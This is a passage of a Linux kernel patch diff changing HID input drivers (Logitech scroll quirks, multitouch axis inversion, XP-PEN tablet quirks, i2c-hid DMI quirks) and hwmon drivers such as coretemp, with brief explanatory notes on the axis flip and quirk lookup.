++			switch (usage->hid & 0xf) {
++			case 0x9: map_key_clear(KEY_MICMUTE); break;
++			default: goto ignore;
++			}
++			break;
++		}
++
+ 		if ((usage->hid & 0xf0) == 0xb0) {	/* SC - Display */
+ 			switch (usage->hid & 0xf) {
+ 			case 0x05: map_key_clear(KEY_SWITCHVIDEOMODE); break;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 9c1ee8e91e0ca..5efc591a02a03 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -77,6 +77,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+ #define HIDPP_QUIRK_HIDPP_EXTRA_MOUSE_BTNS	BIT(27)
+ #define HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS	BIT(28)
++#define HIDPP_QUIRK_HI_RES_SCROLL_1P0		BIT(29)
+ 
+ /* These are just aliases for now */
+ #define HIDPP_QUIRK_KBD_SCROLL_WHEEL HIDPP_QUIRK_HIDPP_WHEELS
+@@ -3472,14 +3473,8 @@ static int hidpp_initialize_hires_scroll(struct hidpp_device *hidpp)
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 2.0 hi-res scrolling\n");
+ 		}
+ 	} else {
+-		struct hidpp_report response;
+-
+-		ret = hidpp_send_rap_command_sync(hidpp,
+-						  REPORT_ID_HIDPP_SHORT,
+-						  HIDPP_GET_REGISTER,
+-						  HIDPP_ENABLE_FAST_SCROLL,
+-						  NULL, 0, &response);
+-		if (!ret) {
++		/* We cannot detect fast scrolling support on HID++ 1.0 devices */
++		if (hidpp->quirks & HIDPP_QUIRK_HI_RES_SCROLL_1P0) {
+ 			hidpp->capabilities |= HIDPP_CAPABILITY_HIDPP10_FAST_SCROLL;
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 1.0 fast scroll\n");
+ 		}
+@@ -4107,6 +4102,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
++	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4162,6 +4158,10 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
++	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
++		will_restart = true;
++
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4176,7 +4176,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	 * Plain USB connections need to actually call start and open
+ 	 * on the transport driver to allow incoming data.
+ 	 */
+-	ret = hid_hw_start(hdev, 0);
++	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4213,6 +4213,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			hidpp->wireless_feature_index = 0;
+ 		else if (ret)
+ 			goto hid_hw_init_fail;
++		ret = 0;
+ 	}
+ 
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+@@ -4227,19 +4228,21 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	hidpp_connect_event(hidpp);
+ 
+-	/* Reset the HID node state */
+-	hid_device_io_stop(hdev);
+-	hid_hw_close(hdev);
+-	hid_hw_stop(hdev);
++	if (will_restart) {
++		/* Reset the HID node state */
++		hid_device_io_stop(hdev);
++		hid_hw_close(hdev);
++		hid_hw_stop(hdev);
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-		connect_mask &= ~HID_CONNECT_HIDINPUT;
++		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
++			connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-	/* Now export the actual inputs and hidraw nodes to the world */
+-	ret = hid_hw_start(hdev, connect_mask);
+-	if (ret) {
+-		hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-		goto hid_hw_start_fail;
++		/* Now export the actual inputs and hidraw nodes to the world */
++		ret = hid_hw_start(hdev, connect_mask);
++		if (ret) {
++			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
++			goto hid_hw_start_fail;
++		}
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4297,9 +4300,15 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	{ /* Mouse Logitech Anywhere MX */
++	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+ 	  LDJ_DEVICE(0x402d),
+ 	  .driver_data = HIDPP_QUIRK_DELAYED_INIT | HIDPP_QUIRK_CLASS_M560 },
++	{ /* Mouse Logitech M705 (firmware RQM17) */
++	  LDJ_DEVICE(0x101b), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
++	{ /* Mouse Logitech Performance MX */
++	  LDJ_DEVICE(0x101a), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Keyboard logitech K400 */
+ 	  LDJ_DEVICE(0x4024),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_K400 },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 372cbdd223e09..e31be0cb8b850 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -71,6 +71,7 @@ MODULE_LICENSE("GPL");
+ #define MT_QUIRK_SEPARATE_APP_REPORT	BIT(19)
+ #define MT_QUIRK_FORCE_MULTI_INPUT	BIT(20)
+ #define MT_QUIRK_DISABLE_WAKEUP		BIT(21)
++#define MT_QUIRK_ORIENTATION_INVERT	BIT(22)
+ 
+ #define MT_INPUTMODE_TOUCHSCREEN	0x02
+ #define MT_INPUTMODE_TOUCHPAD		0x03
+@@ -1009,6 +1010,7 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			    struct mt_usages *slot)
+ {
+ 	struct input_mt *mt = input->mt;
++	struct hid_device *hdev = td->hdev;
+ 	__s32 quirks = app->quirks;
+ 	bool valid = true;
+ 	bool confidence_state = true;
+@@ -1086,6 +1088,10 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 		int orientation = wide;
+ 		int max_azimuth;
+ 		int azimuth;
++		int x;
++		int y;
++		int cx;
++		int cy;
+ 
+ 		if (slot->a != DEFAULT_ZERO) {
+ 			/*
+@@ -1104,6 +1110,9 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			if (azimuth > max_azimuth * 2)
+ 				azimuth -= max_azimuth * 4;
+ 			orientation = -azimuth;
++			if (quirks & MT_QUIRK_ORIENTATION_INVERT)
++				orientation = -orientation;
++
+ 		}
+ 
+ 		if (quirks & MT_QUIRK_TOUCH_SIZE_SCALING) {
+@@ -1115,10 +1124,23 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			minor = minor >> 1;
+ 		}
+ 
+-		input_event(input, EV_ABS, ABS_MT_POSITION_X, *slot->x);
+-		input_event(input, EV_ABS, ABS_MT_POSITION_Y, *slot->y);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_X, *slot->cx);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_Y, *slot->cy);
++		x = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->x :
++			*slot->x;
++		y = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->y :
++			*slot->y;
++		cx = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->cx :
++			*slot->cx;
++		cy = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->cy :
++			*slot->cy;
++
++		input_event(input, EV_ABS, ABS_MT_POSITION_X, x);
++		input_event(input, EV_ABS, ABS_MT_POSITION_Y, y);
++		input_event(input, EV_ABS, ABS_MT_TOOL_X, cx);
++		input_event(input, EV_ABS, ABS_MT_TOOL_Y, cy);
+ 		input_event(input, EV_ABS, ABS_MT_DISTANCE, !*slot->tip_state);
+ 		input_event(input, EV_ABS, ABS_MT_ORIENTATION, orientation);
+ 		input_event(input, EV_ABS, ABS_MT_PRESSURE, *slot->p);
+@@ -1735,6 +1757,15 @@ static int mt_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (id->vendor == HID_ANY_ID && id->product == HID_ANY_ID)
+ 		td->serial_maybe = true;
+ 
++
++	/* Orientation is inverted if the X or Y axes are
++	 * flipped, but normalized if both are inverted.
++	 */
++	if (hdev->quirks & (HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT) &&
++	    !((hdev->quirks & HID_QUIRK_X_INVERT)
++	      && (hdev->quirks & HID_QUIRK_Y_INVERT)))
++		td->mtclass.quirks = MT_QUIRK_ORIENTATION_INVERT;
++
+ 	/* This allows the driver to correctly support devices
+ 	 * that emit events over several HID messages.
+ 	 */
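
The coordinate flip used in mt_process_slot() above is a reflection about the
axis maximum: a value v on an axis spanning [0, max] becomes max - v. With
max = 4095, for instance, a touch at x = 100 is reported at
4095 - 100 = 3995. Reflecting both axes is equivalent to rotating the plane
by 180 degrees, which is why the new MT_QUIRK_ORIENTATION_INVERT is set when
exactly one axis is flipped but not when both are.
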
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 5bc91f68b3747..66e64350f1386 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -1237,7 +1237,7 @@ EXPORT_SYMBOL_GPL(hid_quirks_exit);
+ static unsigned long hid_gets_squirk(const struct hid_device *hdev)
+ {
+ 	const struct hid_device_id *bl_entry;
+-	unsigned long quirks = 0;
++	unsigned long quirks = hdev->initial_quirks;
+ 
+ 	if (hid_match_id(hdev, hid_ignore_list))
+ 		quirks |= HID_QUIRK_IGNORE;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index cfbbc39807a69..bfbb51f8b5beb 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -22,25 +22,6 @@
+ 
+ #include "hid-ids.h"
+ 
+-/* Driver data */
+-struct uclogic_drvdata {
+-	/* Interface parameters */
+-	struct uclogic_params params;
+-	/* Pointer to the replacement report descriptor. NULL if none. */
+-	__u8 *desc_ptr;
+-	/*
+-	 * Size of the replacement report descriptor.
+-	 * Only valid if desc_ptr is not NULL
+-	 */
+-	unsigned int desc_size;
+-	/* Pen input device */
+-	struct input_dev *pen_input;
+-	/* In-range timer */
+-	struct timer_list inrange_timer;
+-	/* Last rotary encoder state, or U8_MAX for none */
+-	u8 re_state;
+-};
+-
+ /**
+  * uclogic_inrange_timeout - handle pen in-range state timeout.
+  * Emulate input events normally generated when pen goes out of range for
+@@ -202,6 +183,7 @@ static int uclogic_probe(struct hid_device *hdev,
+ 	}
+ 	timer_setup(&drvdata->inrange_timer, uclogic_inrange_timeout, 0);
+ 	drvdata->re_state = U8_MAX;
++	drvdata->quirks = id->driver_data;
+ 	hid_set_drvdata(hdev, drvdata);
+ 
+ 	/* Initialize the device and retrieve interface parameters */
+@@ -529,8 +511,14 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06) },
+ 	{ }
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 3c5eea3df3288..0cc03c11ecc22 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1222,6 +1222,11 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+  */
+ static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
+ {
++	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
++
++	if (drvdata->quirks & UCLOGIC_BATTERY_QUIRK)
++		return true;
++
+ 	/* The XP-PEN Deco LW vendor, product and version are identical to the
+ 	 * Deco L. The only difference reported by their firmware is the product
+ 	 * name. Add a quirk to support battery reporting on the wireless
+@@ -1298,6 +1303,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 				       struct hid_device *hdev)
+ {
+ 	int rc = 0;
++	struct uclogic_drvdata *drvdata;
+ 	struct usb_interface *iface;
+ 	__u8 bInterfaceNumber;
+ 	const int str_desc_len = 12;
+@@ -1316,6 +1322,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 		goto cleanup;
+ 	}
+ 
++	drvdata = hid_get_drvdata(hdev);
+ 	iface = to_usb_interface(hdev->dev.parent);
+ 	bInterfaceNumber = iface->cur_altsetting->desc.bInterfaceNumber;
+ 
+@@ -1382,6 +1389,9 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	p.pen.subreport_list[0].id = UCLOGIC_RDESC_V1_FRAME_ID;
+ 
+ 	/* Initialize the frame interface */
++	if (drvdata->quirks & UCLOGIC_MOUSE_FRAME_QUIRK)
++		frame_type = UCLOGIC_PARAMS_FRAME_MOUSE;
++
+ 	switch (frame_type) {
+ 	case UCLOGIC_PARAMS_FRAME_DIAL:
+ 	case UCLOGIC_PARAMS_FRAME_MOUSE:
+@@ -1659,8 +1669,12 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW):
+ 		rc = uclogic_params_ugee_v2_init(&p, hdev);
+ 		if (rc != 0)
+ 			goto cleanup;
+diff --git a/drivers/hid/hid-uclogic-params.h b/drivers/hid/hid-uclogic-params.h
+index a97477c02ff82..b0e7f3807939b 100644
+--- a/drivers/hid/hid-uclogic-params.h
++++ b/drivers/hid/hid-uclogic-params.h
+@@ -19,6 +19,9 @@
+ #include <linux/usb.h>
+ #include <linux/hid.h>
+ 
++#define UCLOGIC_MOUSE_FRAME_QUIRK	BIT(0)
++#define UCLOGIC_BATTERY_QUIRK		BIT(1)
++
+ /* Types of pen in-range reporting */
+ enum uclogic_params_pen_inrange {
+ 	/* Normal reports: zero - out of proximity, one - in proximity */
+@@ -215,6 +218,27 @@ struct uclogic_params {
+ 	struct uclogic_params_frame frame_list[3];
+ };
+ 
++/* Driver data */
++struct uclogic_drvdata {
++	/* Interface parameters */
++	struct uclogic_params params;
++	/* Pointer to the replacement report descriptor. NULL if none. */
++	__u8 *desc_ptr;
++	/*
++	 * Size of the replacement report descriptor.
++	 * Only valid if desc_ptr is not NULL
++	 */
++	unsigned int desc_size;
++	/* Pen input device */
++	struct input_dev *pen_input;
++	/* In-range timer */
++	struct timer_list inrange_timer;
++	/* Last rotary encoder state, or U8_MAX for none */
++	u8 re_state;
++	/* Device quirks */
++	unsigned long quirks;
++};
++
+ /* Initialize a tablet interface and discover its parameters */
+ extern int uclogic_params_init(struct uclogic_params *params,
+ 				struct hid_device *hdev);
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index b86b62f971080..72f2c379812c7 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -1035,6 +1035,10 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 	hid->vendor = le16_to_cpu(ihid->hdesc.wVendorID);
+ 	hid->product = le16_to_cpu(ihid->hdesc.wProductID);
+ 
++	hid->initial_quirks = quirks;
++	hid->initial_quirks |= i2c_hid_get_dmi_quirks(hid->vendor,
++						      hid->product);
++
+ 	snprintf(hid->name, sizeof(hid->name), "%s %04X:%04X",
+ 		 client->name, (u16)hid->vendor, (u16)hid->product);
+ 	strscpy(hid->phys, dev_name(&client->dev), sizeof(hid->phys));
+@@ -1048,8 +1052,6 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 		goto err_mem_free;
+ 	}
+ 
+-	hid->quirks |= quirks;
+-
+ 	return 0;
+ 
+ err_mem_free:
+diff --git a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+index 8e0f67455c098..210f17c3a0be0 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
++++ b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+@@ -10,8 +10,10 @@
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/hid.h>
+ 
+ #include "i2c-hid.h"
++#include "../hid-ids.h"
+ 
+ 
+ struct i2c_hid_desc_override {
+@@ -416,6 +418,28 @@ static const struct dmi_system_id i2c_hid_dmi_desc_override_table[] = {
+ 	{ }	/* Terminate list */
+ };
+ 
++static const struct hid_device_id i2c_hid_elan_flipped_quirks = {
++	HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8, USB_VENDOR_ID_ELAN, 0x2dcd),
++		HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT
++};
++
++/*
++ * This list contains devices which have specific issues based on the system
++ * they're on and not just the device itself. The driver_data will have a
++ * specific hid device to match against.
++ */
++static const struct dmi_system_id i2c_hid_dmi_quirk_table[] = {
++	{
++		.ident = "DynaBook K50/FR",
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&i2c_hid_elan_flipped_quirks,
++	},
++	{ }	/* Terminate list */
++};
++
+ 
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+ {
+@@ -450,3 +474,21 @@ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 	*size = override->hid_report_desc_size;
+ 	return override->hid_report_desc;
+ }
++
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{
++	u32 quirks = 0;
++	const struct dmi_system_id *system_id =
++			dmi_first_match(i2c_hid_dmi_quirk_table);
++
++	if (system_id) {
++		const struct hid_device_id *device_id =
++				(struct hid_device_id *)(system_id->driver_data);
++
++		if (device_id && device_id->vendor == vendor &&
++		    device_id->product == product)
++			quirks = device_id->driver_data;
++	}
++
++	return quirks;
++}
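
i2c_hid_get_dmi_quirks() above matches twice: DMI selects a system-specific entry, and its quirks apply only if the probed device's vendor/product also match. A sketch of that second check with a hypothetical table entry (IDs illustrative only):

#include <stdio.h>

struct hid_id {
	unsigned short vendor, product;
	unsigned long quirks;
};

/* After a DMI match picks an entry, apply it only to the matching device. */
static unsigned long lookup_quirks(const struct hid_id *entry,
				   unsigned short vendor, unsigned short product)
{
	if (entry && entry->vendor == vendor && entry->product == product)
		return entry->quirks;
	return 0;
}

int main(void)
{
	/* hypothetical entry mirroring the flipped-axes Elan touchscreen above */
	struct hid_id elan = { 0x04f3, 0x2dcd, 0x3 };

	printf("%#lx\n", lookup_quirks(&elan, 0x04f3, 0x2dcd));	/* 0x3 */
	printf("%#lx\n", lookup_quirks(&elan, 0x04f3, 0x1234));	/* 0 */
	return 0;
}
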
+diff --git a/drivers/hid/i2c-hid/i2c-hid.h b/drivers/hid/i2c-hid/i2c-hid.h
+index 96c75510ad3f1..2c7b66d5caa0f 100644
+--- a/drivers/hid/i2c-hid/i2c-hid.h
++++ b/drivers/hid/i2c-hid/i2c-hid.h
+@@ -9,6 +9,7 @@
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name);
+ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 					       unsigned int *size);
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product);
+ #else
+ static inline struct i2c_hid_desc
+ 		   *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+@@ -16,6 +17,8 @@ static inline struct i2c_hid_desc
+ static inline char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 							     unsigned int *size)
+ { return NULL; }
++static inline u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{ return 0; }
+ #endif
+ 
+ /**
+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index 3176c33af6c69..300ce8115ce4f 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -1516,7 +1516,7 @@ config SENSORS_NCT6775_CORE
+ config SENSORS_NCT6775
+ 	tristate "Platform driver for Nuvoton NCT6775F and compatibles"
+ 	depends on !PPC
+-	depends on ACPI_WMI || ACPI_WMI=n
++	depends on ACPI || ACPI=n
+ 	select HWMON_VID
+ 	select SENSORS_NCT6775_CORE
+ 	help
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index a901e4e33d81d..b4d65916b3c00 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -299,6 +299,7 @@ static const struct ec_board_info board_info_pro_art_x570_creator_wifi = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB | SENSOR_TEMP_VRM |
+ 		SENSOR_TEMP_T_SENSOR | SENSOR_FAN_CPU_OPT |
+ 		SENSOR_CURR_CPU | SENSOR_IN_CPU_CORE,
++	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+ 	.family = family_amd_500_series,
+ };
+ 
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index ca7a9b373bbd6..3e440ebe2508c 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -588,66 +588,49 @@ static void coretemp_remove_core(struct platform_data *pdata, int indx)
+ 		ida_free(&pdata->ida, indx - BASE_SYSFS_ATTR_NO);
+ }
+ 
+-static int coretemp_probe(struct platform_device *pdev)
++static int coretemp_device_add(int zoneid)
+ {
+-	struct device *dev = &pdev->dev;
++	struct platform_device *pdev;
+ 	struct platform_data *pdata;
++	int err;
+ 
+ 	/* Initialize the per-zone data structures */
+-	pdata = devm_kzalloc(dev, sizeof(struct platform_data), GFP_KERNEL);
++	pdata = kzalloc(sizeof(*pdata), GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+ 
+-	pdata->pkg_id = pdev->id;
++	pdata->pkg_id = zoneid;
+ 	ida_init(&pdata->ida);
+-	platform_set_drvdata(pdev, pdata);
+ 
+-	pdata->hwmon_dev = devm_hwmon_device_register_with_groups(dev, DRVNAME,
+-								  pdata, NULL);
+-	return PTR_ERR_OR_ZERO(pdata->hwmon_dev);
+-}
+-
+-static int coretemp_remove(struct platform_device *pdev)
+-{
+-	struct platform_data *pdata = platform_get_drvdata(pdev);
+-	int i;
++	pdev = platform_device_alloc(DRVNAME, zoneid);
++	if (!pdev) {
++		err = -ENOMEM;
++		goto err_free_pdata;
++	}
+ 
+-	for (i = MAX_CORE_DATA - 1; i >= 0; --i)
+-		if (pdata->core_data[i])
+-			coretemp_remove_core(pdata, i);
++	err = platform_device_add(pdev);
++	if (err)
++		goto err_put_dev;
+ 
+-	ida_destroy(&pdata->ida);
++	platform_set_drvdata(pdev, pdata);
++	zone_devices[zoneid] = pdev;
+ 	return 0;
+-}
+ 
+-static struct platform_driver coretemp_driver = {
+-	.driver = {
+-		.name = DRVNAME,
+-	},
+-	.probe = coretemp_probe,
+-	.remove = coretemp_remove,
+-};
++err_put_dev:
++	platform_device_put(pdev);
++err_free_pdata:
++	kfree(pdata);
++	return err;
++}
+ 
+-static struct platform_device *coretemp_device_add(unsigned int cpu)
++static void coretemp_device_remove(int zoneid)
+ {
+-	int err, zoneid = topology_logical_die_id(cpu);
+-	struct platform_device *pdev;
+-
+-	if (zoneid < 0)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pdev = platform_device_alloc(DRVNAME, zoneid);
+-	if (!pdev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	err = platform_device_add(pdev);
+-	if (err) {
+-		platform_device_put(pdev);
+-		return ERR_PTR(err);
+-	}
++	struct platform_device *pdev = zone_devices[zoneid];
++	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 
+-	zone_devices[zoneid] = pdev;
+-	return pdev;
++	ida_destroy(&pdata->ida);
++	kfree(pdata);
++	platform_device_unregister(pdev);
+ }
+ 
+ static int coretemp_cpu_online(unsigned int cpu)
+@@ -671,7 +654,10 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 	if (!cpu_has(c, X86_FEATURE_DTHERM))
+ 		return -ENODEV;
+ 
+-	if (!pdev) {
++	pdata = platform_get_drvdata(pdev);
++	if (!pdata->hwmon_dev) {
++		struct device *hwmon;
++
+ 		/* Check the microcode version of the CPU */
+ 		if (chk_ucode_version(cpu))
+ 			return -EINVAL;
+@@ -682,9 +668,11 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 		 * online. So, initialize per-pkg data structures and
+ 		 * then bring this core online.
+ 		 */
+-		pdev = coretemp_device_add(cpu);
+-		if (IS_ERR(pdev))
+-			return PTR_ERR(pdev);
++		hwmon = hwmon_device_register_with_groups(&pdev->dev, DRVNAME,
++							  pdata, NULL);
++		if (IS_ERR(hwmon))
++			return PTR_ERR(hwmon);
++		pdata->hwmon_dev = hwmon;
+ 
+ 		/*
+ 		 * Check whether pkgtemp support is available.
+@@ -694,7 +682,6 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 			coretemp_add_core(pdev, cpu, 1);
+ 	}
+ 
+-	pdata = platform_get_drvdata(pdev);
+ 	/*
+ 	 * Check whether a thread sibling is already online. If not add the
+ 	 * interface for this CPU core.
+@@ -713,18 +700,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	struct temp_data *tdata;
+ 	int i, indx = -1, target;
+ 
+-	/*
+-	 * Don't execute this on suspend as the device remove locks
+-	 * up the machine.
+-	 */
++	/* No need to tear down any interfaces for suspend */
+ 	if (cpuhp_tasks_frozen)
+ 		return 0;
+ 
+ 	/* If the physical CPU device does not exist, just return */
+-	if (!pdev)
+-		return 0;
+-
+ 	pd = platform_get_drvdata(pdev);
++	if (!pd->hwmon_dev)
++		return 0;
+ 
+ 	for (i = 0; i < NUM_REAL_CORES; i++) {
+ 		if (pd->cpu_map[i] == topology_core_id(cpu)) {
+@@ -756,13 +739,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	}
+ 
+ 	/*
+-	 * If all cores in this pkg are offline, remove the device. This
+-	 * will invoke the platform driver remove function, which cleans up
+-	 * the rest.
++	 * If all cores in this pkg are offline, remove the interface.
+ 	 */
++	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (cpumask_empty(&pd->cpumask)) {
+-		zone_devices[topology_logical_die_id(cpu)] = NULL;
+-		platform_device_unregister(pdev);
++		if (tdata)
++			coretemp_remove_core(pd, PKG_SYSFS_ATTR_NO);
++		hwmon_device_unregister(pd->hwmon_dev);
++		pd->hwmon_dev = NULL;
+ 		return 0;
+ 	}
+ 
+@@ -770,7 +754,6 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	 * Check whether this core is the target for the package
+ 	 * interface. We need to assign it to some other cpu.
+ 	 */
